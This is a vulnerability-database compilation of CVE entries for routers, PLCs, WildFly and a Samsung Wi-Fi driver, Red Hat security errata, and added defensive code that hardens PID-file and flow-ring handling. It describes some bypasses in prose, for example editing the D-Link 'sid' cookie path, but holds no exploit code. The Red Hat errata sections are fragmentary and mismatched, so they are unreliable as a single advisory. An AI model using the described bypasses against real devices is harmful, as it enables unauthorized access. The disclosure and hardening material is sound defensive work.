*11. *About SecureAuth**
SecureAuth is leveraged by leading companies, their employees, their
customers and their partners to eliminate identity-related breaches.
As a leader in access management, identity governance, and penetration
testing, SecureAuth is powering an identity security revolution by
enabling people and devices to intelligently and adaptively access
systems and data, while effectively keeping bad actors from doing harm.
By ensuring the continuous assessment of risk and enablement of trust,
SecureAuth's highly flexible Identity Security Automation (ISA) platform
makes it easier for organizations to prevent the misuse of credentials
and exponentially reduce the enterprise threat surface. To learn more,
visit www.secureauth.com, call (949) 777-6959, or email us at
info@secureauth.com
*12. *Disclaimer**
The contents of this advisory are copyright (c) 2018 SecureAuth, and are
licensed under a Creative Commons Attribution Non-Commercial Share-Alike
3.0 (United States) License:
http://creativecommons.org/licenses/by-nc-sa/3.0/us/
| VAR-201812-0137 | CVE-2018-17777 | D-Link DVA-5592 Authentication vulnerabilities in devices |
CVSS V2: 7.5 CVSS V3: 9.8 Severity: CRITICAL |
An issue was discovered on D-Link DVA-5592 A1_WI_20180823 devices. If the PIN of the page "/ui/cbpc/login" is the default Parental Control PIN (0000), it is possible to bypass the login form by editing the path of the cookie "sid" generated by the page. The attacker will have access to the router control panel with administrator privileges. The D-Link DVA-5592 device contains an authentication vulnerability. Information may be obtained, information may be altered, and service operation may be disrupted (DoS). The D-Link DVA-5592 is a wireless router from D-Link. A security hole exists in D-Link DVA-5592 devices running firmware version A1_WI_20180823.
| VAR-201812-0012 | CVE-2017-15031 | ARM Trusted Firmware Vulnerable to information disclosure |
CVSS V2: 5.0 CVSS V3: 7.5 Severity: HIGH |
In all versions of ARM Trusted Firmware up to and including v1.4, not initializing or saving/restoring the PMCR_EL0 register can leak secure world timing information.
Attackers can exploit this issue to obtain sensitive information that may lead to further attacks
| VAR-201901-0481 | CVE-2018-17926 | M2M ETHERNET Product Authentication vulnerability |
CVSS V2: 3.3 CVSS V3: 4.3 Severity: MEDIUM |
The product M2M ETHERNET (FW Versions 2.22 and prior, ETH-FW Versions 1.01 and prior) is vulnerable in that an attacker can upload a malicious language file by bypassing the user authentication mechanism. The M2M ETHERNET product (FW and ETH-FW) contains an authentication vulnerability. Information may be tampered with. ABB M2M ETHERNET is a network analysis device from ABB, a Swiss company.
ABB M2M ETHERNET FW 2.22 and earlier and ETH-FW 1.01 and earlier contain an authorization vulnerability. Attackers can use it to upload malicious language files.
An attacker can exploit this issue to bypass the authentication mechanism. Successful exploits may aid in launching further attacks.
| VAR-201905-0080 | CVE-2019-3805 | wildfly Race condition vulnerability |
CVSS V2: 4.7 CVSS V3: 4.7 Severity: MEDIUM |
A flaw was discovered in wildfly versions up to 16.0.0.Final that would allow local users who are able to execute the init.d script to terminate arbitrary processes on the system. An attacker could exploit this by modifying the PID file in /var/run/jboss-eap/, causing the init.d script to terminate any process as root. wildfly contains a race condition vulnerability. The service may be put into a denial of service (DoS) state. Red Hat WildFly is a Java EE-based lightweight open source application server from Red Hat. A race condition vulnerability exists in Red Hat WildFly 16.0.0.Final and prior versions. The vulnerability stems from improper handling of concurrent access when concurrent code needs mutually exclusive access to a shared resource. Red Hat WildFly is prone to a local denial of service vulnerability.
An attacker can leverage this issue to cause a denial of service condition.
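The flaw is a trust problem in the stop path: the init.d script reads a PID out of a file in a directory the service user can write to and kills that PID as root. The following is an added example (POSIX sh, not WildFly's own init script and not code from Red Hat) of the checks a stop routine can make before it signals anything: the PID file must be a regular file rather than a symlink, must contain a single PID above 1, and that PID must belong to a process whose command name matches what was started. The PID-file path and the expected command name are hypothetical arguments; `/proc/<pid>/comm` is used where present, with `ps` as the fallback.

```sh
#!/bin/sh
# Added example, not the WildFly init.d script: validate a PID file before
# trusting it for kill(1). Usage: stop_service /path/to/service.pid java
# (path and command name are hypothetical arguments).

# verify_pidfile PIDFILE EXPECTED_COMM
# Prints the validated PID on stdout and returns 0; returns 1 on any failure.
verify_pidfile() {
    pidfile=$1
    expected_comm=$2

    # 1. Refuse symlinks and anything that is not a regular file: a
    #    service-owned directory lets the service user plant either.
    if [ -L "$pidfile" ] || [ ! -f "$pidfile" ]; then
        echo "refusing: $pidfile is missing or a symlink" >&2
        return 1
    fi

    # 2. The content must be exactly one positive integer, and never PID 1.
    pid=$(head -n 1 "$pidfile" | tr -d '[:space:]')
    case "$pid" in
        ''|*[!0-9]*) echo "refusing: bad pid '$pid' in $pidfile" >&2; return 1 ;;
    esac
    if [ "$pid" -le 1 ]; then
        echo "refusing: pid $pid is init or invalid" >&2
        return 1
    fi

    # 3. The PID must still belong to the program we started; a stale or
    #    attacker-chosen PID that now names some other process is rejected.
    if [ -r "/proc/$pid/comm" ]; then
        comm=$(cat "/proc/$pid/comm")
    else
        comm=$(ps -o comm= -p "$pid" 2>/dev/null || true)
    fi
    comm=$(printf '%s' "$comm" | tr -d '[:space:]')
    if [ "$comm" != "$expected_comm" ]; then
        echo "refusing: pid $pid is '$comm', expected '$expected_comm'" >&2
        return 1
    fi

    printf '%s\n' "$pid"
    return 0
}

# stop_service PIDFILE EXPECTED_COMM
# Sends SIGTERM only to a PID that passed every check above.
stop_service() {
    pid=$(verify_pidfile "$1" "$2") || return 1
    kill "$pid"
}
```

The command-name check narrows what a local user can get killed to processes that look like the service, and it does nothing against PID reuse in the window between the check and the kill; the durable fix is to keep the PID file somewhere only root can write, so that its contents are never attacker-controlled in the first place.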
The purpose of this text-only errata is to inform you about the security
issues fixed in this release.
Installation instructions are available from the Fuse 7.4.0 product
documentation page:
https://access.redhat.com/documentation/en-us/red_hat_fuse/7.4/
4.
The References section of this erratum contains a download link (you must
log in to download the update).
The JBoss server process must be restarted for the update to take effect.
Solution:
Before applying this update, back up your existing Red Hat JBoss Enterprise
Application Platform installation and deployed applications.
For details on how to apply this update, which includes the changes
described in this advisory, refer to:
https://access.redhat.com/articles/11258
5. Bugs fixed (https://bugzilla.redhat.com/):
1628702 - CVE-2018-14642 undertow: Infoleak in some circumstances where Undertow can serve data from a random buffer
1660263 - CVE-2019-3805 wildfly: Race condition on PID file allows for termination of arbitrary processes by local users
1666423 - CVE-2018-14720 jackson-databind: exfiltration/XXE in some JDK classes
1666428 - CVE-2018-14721 jackson-databind: server-side request forgery (SSRF) in axis2-jaxws class
1671096 - CVE-2018-12023 jackson-databind: improper polymorphic deserialization of types from Oracle JDBC driver
1671097 - CVE-2018-12022 jackson-databind: improper polymorphic deserialization of types from Jodd-db library
1677341 - CVE-2018-11307 jackson-databind: Potential information exfiltration with default typing, serialization gadget from MyBatis
1682108 - CVE-2019-3894 wildfly: wrong SecurityIdentity for EE concurrency threads that are reused
6. JIRA issues fixed (https://issues.jboss.org/):
JBEAP-14861 - [GSS](7.2.z) Upgrade JBeret from 1.3.1.Final to 1.3.2.Final
JBEAP-15392 - (7.2.z) Upgrade Apache CXF from 3.2.5 to 3.2.7
JBEAP-15477 - (7.2.z) Upgrade PicketLink bindings from 2.5.5.SP12-redhat-2 to 2.5.5.SP12-redhat-4
JBEAP-15478 - (7.2.z) Upgrade PicketLink from 2.5.5.SP12-redhat-2 to 2.5.5.SP12-redhat-4
JBEAP-15568 - [GSS](7.2.z) Upgrade ironjacamar from 1.4.11 Final to 1.4.15 Final
JBEAP-15617 - (7.2.z) Upgrade WildFly Core from 6.0.11 to 6.0.12
JBEAP-15622 - [GSS](7.2.z) Upgrade jboss-el-api_spec from 1.0.12.Final to 1.0.13.Final
JBEAP-15748 - [GSS](7.2.z) Upgrade jastow from 2.0.6.Final-redhat-00001 to 2.0.7.Final-redhat-00001
JBEAP-15805 - (7.2.z) Upgrade Hibernate ORM from 5.3.7 to 5.3.8
JBEAP-15851 - [ENG] (7.2.z) Upgrade Infinispan from 9.3.3.Final to 9.3.6.Final
JBEAP-15869 - (7.2.z) Upgrade Undertow from 2.0.15 to 2.0.19
JBEAP-15876 - (7.2.z) Upgrade Artemis from 2.6.3.redhat-00014 to 2.6.3.redhat-00020
JBEAP-16025 - Upgrade yasson from 1.0.1 to 1.0.2
JBEAP-16037 - [GSS](7.2.z) Upgrade Narayana from 5.9.0.Final to 5.9.1.Final
JBEAP-16086 - (7.2.z) Upgrade WildFly HTTP client from 1.0.12.Final to 1.0.13.Final
JBEAP-16090 - [GSS](7.2.z) Upgrade jboss-ejb-client from 4.0.12 to 4.0.15
JBEAP-16091 - [GSS](7.2.z) Upgrade wildfly-transaction-client from 1.1.2.Final-redhat-1 to 1.1.3.Final-redhat-1
JBEAP-16112 - (7.2.z) Upgrade FasterXML Jackson from 2.9.5.redhat-2 to 2.9.8
JBEAP-16122 - [Runtimes] (7.2.z) Upgrade istack from 3.0.5.redhat-1 to 3.0.7.redhat-00001
JBEAP-16123 - [Runtimes] (7.2.x) Upgrade commons-digester from 1.8 to 1.8.1.redhat-4
JBEAP-16124 - [Runtimes] (7.2.x) Upgrade hornetq from 2.4.7.redhat-1 to 2.4.7.redhat-2
JBEAP-16125 - [Runtimes] (7.2.x) Upgrade org.jboss.genericjms from 2.0.1.Final-redhat-1 to 2.0.1.Final-redhat-00002
JBEAP-16137 - (7.2.z) (WFCORE) Upgrade FasterXML Jackson from 2.9.2 to 2.9.8
JBEAP-16146 - (7.2.z) Upgrade Elytron from 1.6.1.Final to 1.6.2.Final
JBEAP-16147 - (7.2.z) Upgrade Elytron-Tool from 1.4.0 to 1.4.1.Final
JBEAP-16234 - Tracker bug for the EAP 7.2.1 release for RHEL-7
JBEAP-16259 - (7.2.z) Upgrade legacy EJB Client from 3.0.2.Final-redhat-1 to 3.0.3.Final-redhat-1
JBEAP-16276 - (7.2.z) Upgrade elytron-web from 1.2.3.Final to 1.2.4.Final
JBEAP-16321 - (7.2.z) HHH-13099 HHH-13283 Upgrade ByteBuddy from 1.8.17 to 1.9.5
JBEAP-16347 - (7.2.z) Upgrade jboss-logmanager from 2.1.5.Final-redhat-00001 to 2.1.7.Final
JBEAP-16356 - (7.2.z) Upgrade RESTEasy from 3.6.1.SP2 to 3.6.1.SP3
JBEAP-16367 - (7.2.z) Upgrade commons-lang3 from 3.6.0-redhat-1 to 3.8-redhat-00001
JBEAP-16368 - (7.2.z) Upgrade cxf-xjc from 3.2.2.redhat-00001 to 3.2.3.redhat-00002
JBEAP-16369 - (7.2.z) Upgrade httpasyncclient from 4.1.3.redhat-2 to 4.1.4.redhat-00001
JBEAP-16381 - (7.2.z) Upgrade jboss-remoting-jmx from 3.0.0.Final to 3.0.1.Final
JBEAP-16418 - (7.2.z) Upgrade Hibernate ORM from 5.3.8 to 5.3.9
JBEAP-9657 - (7.2.z) Upgrade jboss-negotiation from 3.0.4 to 3.0.5.Final-redhat-00001
7. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/
8. Summary:
This is a security update for JBoss EAP Continuous Delivery 18.0.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
====================================================================
Red Hat Security Advisory
Synopsis: Important: Red Hat Data Grid 7.3.3 security update
Advisory ID: RHSA-2020:0727-01
Product: Red Hat JBoss Data Grid
Advisory URL: https://access.redhat.com/errata/RHSA-2020:0727
Issue date: 2020-03-05
CVE Names: CVE-2018-14335 CVE-2019-3805 CVE-2019-3888
CVE-2019-9512 CVE-2019-9514 CVE-2019-9515
CVE-2019-9518 CVE-2019-10173 CVE-2019-10174
CVE-2019-10184 CVE-2019-10212 CVE-2019-14379
====================================================================
1. Summary:
An update for Red Hat Data Grid is now available.
Red Hat Product Security has rated this update as having a security impact
of Important. A Common Vulnerability Scoring System (CVSS) base score,
which gives a detailed severity rating, is available for each vulnerability
from the CVE link(s) in the References section.
2. Description:
Red Hat Data Grid is a distributed, in-memory, NoSQL datastore based on the
Infinispan project.
This release of Red Hat Data Grid 7.3.3 serves as a replacement for Red Hat
Data Grid 7.3.2 and includes bug fixes and enhancements, which are
described in the Release Notes, linked to in the References section of this
erratum.
Security Fix(es):
* HTTP/2: flood using PING frames results in unbounded memory growth
(CVE-2019-9512)
* HTTP/2: flood using HEADERS frames results in unbounded memory growth
(CVE-2019-9514)
* HTTP/2: flood using SETTINGS frames results in unbounded memory growth
(CVE-2019-9515)
* HTTP/2: flood using empty frames results in excessive resource
consumption (CVE-2019-9518)
* xstream: remote code execution due to insecure XML deserialization
(regression of CVE-2013-7285) (CVE-2019-10173)
* infinispan: invokeAccessibly method from ReflectionUtil class allows to
invoke private methods (CVE-2019-10174)
* jackson-databind: default typing mishandling leading to remote code
execution (CVE-2019-14379)
* h2: Information Exposure due to insecure handling of permissions in the
backup (CVE-2018-14335)
* wildfly: Race condition on PID file allows for termination of arbitrary
processes by local users (CVE-2019-3805)
* undertow: leak credentials to log files
UndertowLogger.REQUEST_LOGGER.undertowRequestFailed (CVE-2019-3888)
* undertow: DEBUG log for io.undertow.request.security if enabled leaks
credentials to log files (CVE-2019-10212)
* undertow: Information leak in requests for directories without trailing
slashes (CVE-2019-10184)
For more details about the security issue(s), including the impact, a CVSS
score, acknowledgments, and other related information, refer to the CVE
page(s) listed in the References section.
3. Solution:
To install this update, do the following:
1. Download the Data Grid 7.3.3 server patch from the customer portal.
2. Back up your existing Data Grid installation. You should back up
databases, configuration files, and so on.
3. Install the Data Grid 7.3.3 server patch. Refer to the 7.3 Release Notes
for patching instructions.
4. Restart Data Grid to ensure the changes take effect.
4. Bugs fixed (https://bugzilla.redhat.com/):
1610877 - CVE-2018-14335 h2: Information Exposure due to insecure handling of permissions in the backup
1660263 - CVE-2019-3805 wildfly: Race condition on PID file allows for termination of arbitrary processes by local users
1693777 - CVE-2019-3888 undertow: leak credentials to log files UndertowLogger.REQUEST_LOGGER.undertowRequestFailed
1703469 - CVE-2019-10174 infinispan: invokeAccessibly method from ReflectionUtil class allows to invoke private methods
1713068 - CVE-2019-10184 undertow: Information leak in requests for directories without trailing slashes
1722971 - CVE-2019-10173 xstream: remote code execution due to insecure XML deserialization (regression of CVE-2013-7285)
1731984 - CVE-2019-10212 undertow: DEBUG log for io.undertow.request.security if enabled leaks credentials to log files
1735645 - CVE-2019-9512 HTTP/2: flood using PING frames results in unbounded memory growth
1735744 - CVE-2019-9514 HTTP/2: flood using HEADERS frames results in unbounded memory growth
1735745 - CVE-2019-9515 HTTP/2: flood using SETTINGS frames results in unbounded memory growth
1735749 - CVE-2019-9518 HTTP/2: flood using empty frames results in excessive resource consumption
1737517 - CVE-2019-14379 jackson-databind: default typing mishandling leading to remote code execution
5. References:
https://access.redhat.com/security/cve/CVE-2018-14335
https://access.redhat.com/security/cve/CVE-2019-3805
https://access.redhat.com/security/cve/CVE-2019-3888
https://access.redhat.com/security/cve/CVE-2019-9512
https://access.redhat.com/security/cve/CVE-2019-9514
https://access.redhat.com/security/cve/CVE-2019-9515
https://access.redhat.com/security/cve/CVE-2019-9518
https://access.redhat.com/security/cve/CVE-2019-10173
https://access.redhat.com/security/cve/CVE-2019-10174
https://access.redhat.com/security/cve/CVE-2019-10184
https://access.redhat.com/security/cve/CVE-2019-10212
https://access.redhat.com/security/cve/CVE-2019-14379
https://access.redhat.com/security/updates/classification/#important
https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?product=data.grid&downloadType=patches&version=7.3
https://access.redhat.com/documentation/en-us/red_hat_data_grid/7.3/html-single/red_hat_data_grid_7.3_release_notes/index
6. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2020 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iQIVAwUBXmD2b9zjgjWX9erEAQhDqA/9G7uM0HlTt4M6Z9Zc23FSbbr+jj1k/o69
a5WWa+xS3Ko4IvlN5rt+wOHSFet+NTMAerNHzAsB2+viX1hr14Hwf3QnIom/yxbJ
PaC1djdaZfcvSIODhbq/C5Ilae09x3rW1voQ39i1Q2bsEqVePLZdC75KjvNLsfqe
QJCMvcO3jkccxn7k45baCfTGsFyOhHb17Y9DRarWsC7jO9kEjMxrUPN6qKP6BC9t
RMuqDxo1aJnatMeCWb7NA0UpOz0+lFpuR+ZZYPV444nGmfTKrbc9c5TuQUCSP+LD
sG1+fh2xMztuGxNiJfgSP3iqHmgXD9TBxh1kxn1kt59llCO5+Uqu/O5OsqeQQ0Ym
I+a2VAzn2N776sTbWIZ3231IJex68oG+4/fIo6/FVVJpmtDIDgumgErTPD0kkNuT
yyyn3u50RZohzSxEz37QdiQDJbiJcJhmtFR5fLRAbFa8Ys2Gw81PGFba95/kVooX
K5uSukzOBm8nhxfBvwZDCY/gWuJwVLSAOJb4VoPZiR2WbZsx+9r+spQv6K9wYr5v
s//DY88rsUSaMH4kGco//6Dqis8IwOISr/ZR+Edlnrz1rHv9Z4XerMw56VUKIHva
mS7rdNmbLqHN0XfZImxewLca2i7sWIlxWrgKF2f4zEO3ermivdis7RdssZkJ9Zv9
S7B2VoNOQj4=
=zoia
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
| VAR-201901-0452 | CVE-2018-10612 | Access control vulnerability in 3S-Smart Software Solutions GmbH CODESYS Control V3 products |
CVSS V2: 10.0 CVSS V3: 9.8 Severity: CRITICAL |
In 3S-Smart Software Solutions GmbH CODESYS Control V3 products prior to version 3.5.14.0, user access management and communication encryption are not enabled by default, which could allow an attacker access to the device and to sensitive information, including user credentials. CODESYS Control for BeagleBone and the other products listed below are programming software for industrial control system development from the German company 3S-Smart Software Solutions GmbH. The following products and versions are affected: CODESYS Control for BeagleBone, CODESYS Control for emPC-A / iMX6, CODESYS Control for IOT2000, CODESYS Control for Linux, CODESYS Control for PFC100, CODESYS Control for PFC200, CODESYS Control for Raspberry Pi, CODESYS Control RTE V3, CODESYS Control RTE V3 (for Beckhoff CX), CODESYS Control Win V3 (part of CODESYS setup), CODESYS V3 Simulation Runtime (part of CODESYS Development System), CODESYS Control V3 Runtime System Toolkit, CODESYS HMI V3.
An attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions. Successful exploitation may aid in launching further attacks. Because the weakness is a default configuration rather than a code defect, upgrading alone is not sufficient on existing installations: user management and encrypted communication must be verified as enabled on each deployed runtime.
| VAR-201812-0851 | CVE-2018-7833 | Exceptional condition check vulnerability in multiple Schneider Electric products |
CVSS V2: 5.0 CVSS V3: 7.5 Severity: HIGH |
An Improper Check for Unusual or Exceptional Conditions vulnerability exists in the embedded web servers in all Modicon M340, Premium and Quantum PLCs and the BMXNOR0200, where an unauthenticated user can send specially crafted XML data in a POST request to cause the web server to become unavailable. Multiple Schneider Electric products contain this exceptional condition check vulnerability. Exploitation can result in a denial of service (DoS) of the embedded web server.
| VAR-201812-0849 | CVE-2018-7812 | Information disclosure vulnerability in multiple Schneider Electric products |
CVSS V2: 5.0 CVSS V3: 7.5 Severity: HIGH |
An Information Exposure Through Discrepancy vulnerability exists in the embedded web servers in all Modicon M340, Premium and Quantum PLCs and the BMXNOR0200, where the web server sends different responses in a way that exposes security-relevant information about the state of the product, such as whether a particular operation was successful or not. Multiple Schneider Electric products contain this information disclosure vulnerability; an attacker can use the response differences to obtain information. Schneider Electric Modicon M340 and the other products listed are programmable logic controllers from Schneider Electric of France.
| VAR-201812-0133 | CVE-2018-14856 | Samsung Galaxy S6 SM-G920F Buffer error vulnerability |
CVSS V2: 5.8 CVSS V3: 6.3 Severity: MEDIUM |
Buffer overflow in dhd_bus_flow_ring_create_response in drivers/net/wireless/bcmdhd4358/dhd_pcie.c in the bcmdhd4358 Wi-Fi driver on the Samsung Galaxy S6 SM-G920F G920FXXU5EQH7 allows an attacker (who has obtained code execution on the Wi-Fi chip) to cause the device driver to perform invalid memory accesses. The Samsung ID is SVE-2018-11785. The Samsung Galaxy S6 SM-G920F contains a buffer error vulnerability, which the vendor has confirmed and published under Samsung ID SVE-2018-11785. Information may be obtained or altered, and service operation may be disrupted (DoS). The Samsung Galaxy S6 is a smartphone released by South Korea's Samsung; bcmdhd4358 is one of its Wi-Fi drivers. An attacker who already controls the Wi-Fi chip could exploit the vulnerability to make the host driver access invalid memory; the attack surface is the chip-to-host message interface, not the air interface itself.
| VAR-201812-0132 | CVE-2018-14855 | Samsung Galaxy S6 Buffer error vulnerability |
CVSS V2: 5.8 CVSS V3: 6.3 Severity: MEDIUM |
Buffer overflow in dhd_bus_flow_ring_flush_response in drivers/net/wireless/bcmdhd4358/dhd_pcie.c in the bcmdhd4358 Wi-Fi driver on the Samsung Galaxy S6 allows an attacker (who has obtained code execution on the Wi-Fi chip) to cause the device driver to perform invalid memory accesses. The Samsung ID is SVE-2018-11785. The Samsung Galaxy S6 contains a buffer error vulnerability, which the vendor has confirmed and published under Samsung ID SVE-2018-11785. Information may be obtained or altered, and service operation may be disrupted (DoS). The Samsung Galaxy S6 is a smartphone released by South Korea's Samsung; bcmdhd4358 is one of its Wi-Fi drivers. An attacker who already controls the Wi-Fi chip could exploit the vulnerability to make the host driver access invalid memory.
| VAR-201812-0131 | CVE-2018-14854 | Samsung Galaxy S6 SM-G920F Buffer error vulnerability |
CVSS V2: 5.8 CVSS V3: 6.3 Severity: MEDIUM |
Buffer overflow in dhd_bus_flow_ring_delete_response in drivers/net/wireless/bcmdhd4358/dhd_pcie.c in the bcmdhd4358 Wi-Fi driver on the Samsung Galaxy S6 SM-G920F G920FXXU5EQH7 allows an attacker (who has obtained code execution on the Wi-Fi chip) to cause the device driver to perform invalid memory accesses. The Samsung ID is SVE-2018-11785. The Samsung Galaxy S6 SM-G920F contains a buffer error vulnerability, which the vendor has confirmed and published under Samsung ID SVE-2018-11785. Information may be obtained or altered, and service operation may be disrupted (DoS). The Samsung Galaxy S6 is a smartphone released by South Korea's Samsung; bcmdhd4358 is one of its Wi-Fi drivers. An attacker who already controls the Wi-Fi chip could exploit the vulnerability to make the host driver access invalid memory.
| VAR-201812-0130 | CVE-2018-14853 | NULL pointer dereference vulnerability in Samsung Galaxy S6 SM-G920F |
CVSS V2: 3.3 CVSS V3: 4.3 Severity: MEDIUM |
A NULL pointer dereference in dhd_prot_txdata_write_flush in drivers/net/wireless/bcmdhd4358/dhd_msgbuf.c in the bcmdhd4358 Wi-Fi driver on the Samsung Galaxy S6 SM-G920F G920FXXU5EQH7 allows an attacker (who has obtained code execution on the Wi-Fi chip) to cause the device to reboot. The Samsung ID is SVE-2018-11783. The Samsung Galaxy S6 SM-G920F contains a NULL pointer dereference vulnerability, which the vendor has confirmed and published under Samsung ID SVE-2018-11783. Service operation may be disrupted (DoS). The Samsung Galaxy S6 is a smartphone released by South Korea's Samsung; bcmdhd4358 is one of its Wi-Fi drivers. An attacker who already controls the Wi-Fi chip could exploit the vulnerability to cause a device reboot.
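The four bcmdhd4358 entries above (CVE-2018-14853 through CVE-2018-14856) share one root cause: the host driver acts on flow-ring identifiers carried in completion messages that the Wi-Fi chip's firmware writes into shared memory, and an attacker who already runs code on the chip controls every field of those messages. The C program below is an added illustration of that trust boundary, with the unchecked index computation beside a hardened lookup that validates both the range of the chip-supplied id and the state of the slot it names. It is not code from the bcmdhd4358 driver, Samsung or Broadcom; the structure layouts, field names, ring count, buffer size and state names are assumptions chosen for the example, and the message sequence in run_demo is constructed.

```c
/*
 * Added illustration (not bcmdhd4358 or Samsung code) of the trust boundary in
 * the four Samsung Galaxy S6 entries above: the host driver consumes completion
 * messages written by Wi-Fi chip firmware, so once an attacker runs code on the
 * chip every field is attacker-controlled. All names and sizes are assumptions.
 */
#include <stdbool.h>
#include <stdint.h>
#include <string.h>

#define MAX_FLOW_RINGS    40   /* assumed size of the host's flow-ring table */
#define FLOW_RING_ID_BASE  2   /* assumed: ids below this are control rings */
#define TX_RING_BYTES     64   /* assumed: toy per-ring TX buffer size */

enum flow_state { FLOW_IDLE, FLOW_CREATING, FLOW_OPEN };

struct flow_ring {
    enum flow_state state;
    uint8_t *tx_ring;            /* NULL until the host allocates it */
};

struct flow_ring_resp {          /* completion as written by the chip (assumed) */
    uint16_t flow_id;            /* chip-supplied; must be validated */
    int16_t  status;             /* 0 = success, anything else = failure */
};

struct host_ctx {
    struct flow_ring rings[MAX_FLOW_RINGS];
    uint8_t tx_storage[MAX_FLOW_RINGS][TX_RING_BYTES];
    unsigned rejected;           /* chip messages dropped as invalid */
};

/* The vulnerable pattern: index rings[] straight from the chip's flow_id with no
 * range check. Returned, not dereferenced, so the demo cannot corrupt memory. */
long ring_index_unchecked(uint16_t flow_id)
{
    return (long)flow_id - FLOW_RING_ID_BASE;
}

/* Hardened lookup: reject ids below the base or beyond the table. */
static struct flow_ring *lookup_ring(struct host_ctx *ctx, uint16_t flow_id)
{
    if (flow_id < FLOW_RING_ID_BASE || flow_id - FLOW_RING_ID_BASE >= MAX_FLOW_RINGS) {
        ctx->rejected++;
        return NULL;
    }
    return &ctx->rings[flow_id - FLOW_RING_ID_BASE];
}

/* Host side: only the host moves a slot IDLE -> CREATING and gives it a buffer. */
bool host_request_create(struct host_ctx *ctx, uint16_t flow_id)
{
    struct flow_ring *fr = lookup_ring(ctx, flow_id);
    if (!fr || fr->state != FLOW_IDLE) return false;
    fr->state = FLOW_CREATING;
    fr->tx_ring = ctx->tx_storage[flow_id - FLOW_RING_ID_BASE];
    return true;
}

/* Chip -> host create completion (cf. dhd_bus_flow_ring_create_response): the slot
 * must also be one the host asked for. Flush/delete completions are checked the
 * same way, against FLOW_OPEN. */
bool on_create_response(struct host_ctx *ctx, const struct flow_ring_resp *r)
{
    struct flow_ring *fr = lookup_ring(ctx, r->flow_id);
    if (!fr) return false;
    if (fr->state != FLOW_CREATING) { ctx->rejected++; return false; }
    fr->state = (r->status == 0) ? FLOW_OPEN : FLOW_IDLE;
    if (r->status != 0) fr->tx_ring = NULL;
    return true;
}

/* Host TX path keyed by a chip-supplied id (cf. dhd_prot_txdata_write_flush):
 * touching tx_ring of a slot never created is the NULL dereference. Returns the
 * bytes flushed, or -1 when rejected. */
int on_txdata_flush(struct host_ctx *ctx, uint16_t flow_id)
{
    struct flow_ring *fr = lookup_ring(ctx, flow_id);
    if (!fr) return -1;
    if (fr->state != FLOW_OPEN || !fr->tx_ring) { ctx->rejected++; return -1; }
    memset(fr->tx_ring, 0, TX_RING_BYTES); /* stand-in for posting TX work */
    return TX_RING_BYTES;
}

/* Constructed exchange: one honest ring setup, then three messages of the kind a
 * compromised chip could send. Returns how many were rejected. */
unsigned run_demo(void)
{
    struct host_ctx ctx = { 0 };
    struct flow_ring_resp ok = { 5, 0 }, oob = { 0xFFFF, 0 }, unasked = { 7, 0 };
    host_request_create(&ctx, 5);
    on_create_response(&ctx, &ok);          /* accepted: ring 5 is now OPEN */
    on_txdata_flush(&ctx, 5);               /* accepted */
    on_create_response(&ctx, &oob);         /* rejected: index would be 65533 */
    on_create_response(&ctx, &unasked);     /* rejected: slot 7 is still IDLE */
    on_txdata_flush(&ctx, 9);               /* rejected: ring 9 never created */
    return ctx.rejected;
}
int main(void) { return run_demo() == 3 ? 0 : 1; }
```

Compile with a C99 compiler and warnings enabled; the process exits 0 when all three hostile messages are dropped. The point of the state check alongside the range check is that a chip-chosen id inside the table can still name a slot the host never set up, which is where the NULL tx_ring in the last case comes from; a range check alone would leave that path open.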